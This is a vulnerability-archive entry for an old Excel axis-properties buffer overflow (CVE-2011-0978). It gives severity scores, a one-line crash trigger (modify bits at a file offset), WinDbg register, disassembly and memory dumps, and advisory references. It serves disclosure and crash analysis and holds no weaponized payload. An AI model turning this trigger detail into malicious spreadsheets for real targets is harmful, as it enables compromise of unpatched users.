Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC

2011-05-03 / 2011-05-04
Credit: webDEViL
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

""" This is a PoC for MS11-021/CVE-2011-0978 Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow w3bd3vil[at]gmail[dot].com twitter.com/w3bd3vil Modify bits at file location 0x39E7 0:000:x86> r eax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554 eip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 2f36a2d5 33d2 xor edx,edx 2f36a2d7 53 push ebx 2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h] 2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx 2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch] 2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78) 2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx 2f36a2ed 56 push esi 2f36a2ee 57 push edi 2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95) 2f36a2f5 395514 cmp dword ptr [ebp+14h],edx 2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321) 2f36a2fa 8b4010 mov eax,dword ptr [eax+10h] 2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=???????? 2f36a300 3bc2 cmp eax,edx 2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329) 2f36a304 0fb738 movzx edi,word ptr [eax] 2f36a307 8d4c3f02 lea ecx,[edi+edi+2] 2f36a30b 51 push ecx eax here points to location in the file 0xFB4. 0:000:x86> dd eax 04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318 04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8 04dd63a0 04dd03e0 00000000 00000001 00000001 04dd63b0 00000001 00000001 00000001 00000001 04dd63c0 00000001 00000001 00000001 00000000 04dd63d0 00000000 00000000 00000000 00000000 04dd63e0 00000000 00000000 00000000 00000000 04dd63f0 00000000 00000000 00000000 00000000 0:000:x86> dd 0376ec80 0376ec80 00630009 0061006c 00730073 006f0077 0376ec90 006b0072 eaf10000 00770009 00720061 0376eca0 0075006d 00200070 00350023 eaf10000 0376ecb0 0283eb30 6666ce60 0283eb40 6666c960 0376ecc0 0283eb4c 6666c960 0000f80c 00000000 0376ecd0 00006338 00000000 00000001 00000000 0376ece0 0283eb98 6666ce60 0283eba4 6666c960 0376ecf0 0283ebb0 6666c960 00000000 00000000 webDEViL

References:

http://zerodayinitiative.com/advisories/ZDI-11-042/
http://www.vupen.com/english/advisories/2011/0940
http://www.securitytracker.com/id?1025337
http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx
http://secunia.com/advisories/43232
http://secunia.com/advisories/39122
http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-microsoft
http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12439


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top